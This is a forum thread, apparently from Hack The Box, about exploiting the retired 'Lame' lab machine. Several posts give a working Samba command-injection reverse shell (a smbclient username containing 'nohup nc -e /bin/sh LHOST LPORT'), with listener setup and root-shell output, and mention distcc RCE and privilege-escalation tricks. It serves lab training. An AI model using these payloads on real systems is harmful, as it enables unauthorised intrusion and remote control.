Lame write-up by Arrexel

Can you please provide the “manual exploitation (exploit db exploit) process” as well for all of your tutorials??

@goutsou said:
Can you please provide the “manual exploitation (exploit db exploit) process” as well for all of your tutorials??

Yea I will be adding that to them all from now on, will fix lame/legacy after I finish my next one.

Awesome thanks @Arrexel

@alamot said:
And for those who like to do things manually or they aren’t allowed to use metasploit:
smbclient -U “/=\`nohup nc -e /bin/sh LHOST LPORT\`” -N -I 10.10.10.3 //LAME/tmp

Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can’t seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max–protocol options.

I’m simply trying to ping my machine before getting onto the reverse shell part but I can’t seem to trigger the payload, can you please confirm if your command above works for you?

Thanks and keep up the good work guys :slight_smile:

ps. I’m aware the displayed command is HTML encoded

@ps3tsuneo Those html entities didn’t show up before. Anyway I uploaded the commands here (I had tested them and they worked): code-snippets/lame.txt at master · Alamot/code-snippets · GitHub

@ps3tsuneo said:

@alamot said:
And for those who like to do things manually or they aren’t allowed to use metasploit:
smbclient -U “/=\`nohup nc -e /bin/sh LHOST LPORT\`” -N -I 10.10.10.3 //LAME/tmp

Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can’t seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max–protocol options.

I’m simply trying to ping my machine before getting onto the reverse shell part but I can’t seem to trigger the payload, can you please confirm if your command above works for you?

Thanks and keep up the good work guys :slight_smile:

ps. I’m aware the displayed command is HTML encoded

@alamot said:
@ps3tsuneo Those html entities didn’t show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

Thanks a lot @alamot ! I did manage to make it work yesterday. Dont know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

Also had to modify the command a bit to append a “.” at the beginning (smbclient -U “./=`nohup nc -e /bin/sh LHOST LPORT`” -N -I 10.10.10.3 -p 139 //LAME/tmp)

Thanks for your quick reply!

@SirenCeol said:
Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

This one returns:
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

why?

@ps3tsuneo said:

@ps3tsuneo said:

@alamot said:
And for those who like to do things manually or they aren’t allowed to use metasploit:
smbclient -U “/=\`nohup nc -e /bin/sh LHOST LPORT\`” -N -I 10.10.10.3 //LAME/tmp

Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can’t seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max–protocol options.

I’m simply trying to ping my machine before getting onto the reverse shell part but I can’t seem to trigger the payload, can you please confirm if your command above works for you?

Thanks and keep up the good work guys :slight_smile:

ps. I’m aware the displayed command is HTML encoded

@alamot said:
@ps3tsuneo Those html entities didn’t show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

Thanks a lot @alamot ! I did manage to make it work yesterday. Dont know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

Also had to modify the command a bit to append a “.” at the beginning (smbclient -U “./=`nohup nc -e /bin/sh LHOST LPORT`” -N -I 10.10.10.3 -p 139 //LAME/tmp)

Thanks for your quick reply!

Can you please explain how you disabled spnego?
–option=“client use spnego = no” not working here

I disabled it in /etc/samba/smb.conf, rebooted Kali and still not working

I am new so sorry if this too noob of a question.

The msf’s smb/pipe_auditor shows me different output than what you have in the write-up. Here’s what it looks like.

msf auxiliary(scanner/smb/pipe_auditor) > run

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) >

What am I doing wrong here?
Thanks.

“client use spnego = no” in the smb.conf file does not work for me ether… the result of the connection is the following:

session request ok
negotiated dialect[NT1] against server[10.10.10.3]
NT1 login failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE

If no “client use spnego = no” setting is set, the result is:

gensec_update_done: ntlmssp[0x16ddf20]: NT_STATUS_OK tevent_req[0x16dbe40/…/auth/ntlmssp/ntlmssp.c:181]: state[2] error[0 (0x0)] state[struct gensec_ntlmssp_update_state (0x16dbf20)] timer[(nil)] finish[…/auth/ntlmssp/ntlmssp.c:222]
gensec_update_done: spnego[0x16dd440]: NT_STATUS_MORE_PROCESSING_REQUIRED tevent_req[0x16ddad0/…/auth/gensec/spnego.c:1601]: state[2] error[0 (0x0)] state[struct gensec_spnego_update_state (0x16ddbb0)] timer[(nil)] finish[…/auth/gensec/spnego.c:2070]
SPNEGO login failed: The attempted logon is invalid. This is either due to a bad username or authentication information.
session setup failed: NT_STATUS_LOGON_FAILURE

Ok, found another (almost the same) manual way which worked for me:

Setup listener:

~# nc -nvlp LPORT

Connect to the Lame using Smbclient:

~# smbclient //10.10.10.3/tmp
Enter WORKGROUP\root's password: {Hit Enter}
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

Execute payload within SMB session:

smb: \> logon "./=`nohup nc -e /bin/sh LHOST LPORT`"
Password: {Hit Enter}

Done. You should receive the connection to your listener:

listening on [any] 4444 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.3] 57347
ls /root/
Desktop
reset_logs.sh
root.txt
vnc.log

@SirenCeol said:
Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

The aggressive scan from Nmap (also known as -A) is the same thing as -sC -sV --traceroute, but it may be change in the future (according to the Nmap Docs). So do not need specify -sC at command line whether -A is present.

You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I’m sure there are many other ways to get root.

Hey! I am not getting any results by the Nmap command. It says that the host is down, if it is up then use -Pn. I used that too but not getting anything. I am doing this for the first time. Do we have to use any VPN (from Access tab of HTB) to do this? I am on a Wi-Fi.

Are you able to reach other IPs? If not, then vpn issue. Are you vip member?
Reset the box and try…

I am able to reach any IPs outside HTB by nmap. When I try to probe any IP inside HTB retired machines, it fails.
I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?

I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?

Type your comment> @Nofix said:

You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I’m sure there are many other ways to get root.

I used also MSF exploit for port 3632, later I used nmap --interactive

Type your comment> @azasdf74M said:

Type your comment> @Nofix said:

You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I’m sure there are many other ways to get root.

I used also MSF exploit for port 3632, later I used nmap --interactive

I used an nmap script for RCE and then uploaded a shell via wget RCE and spotted the nmap issue right away.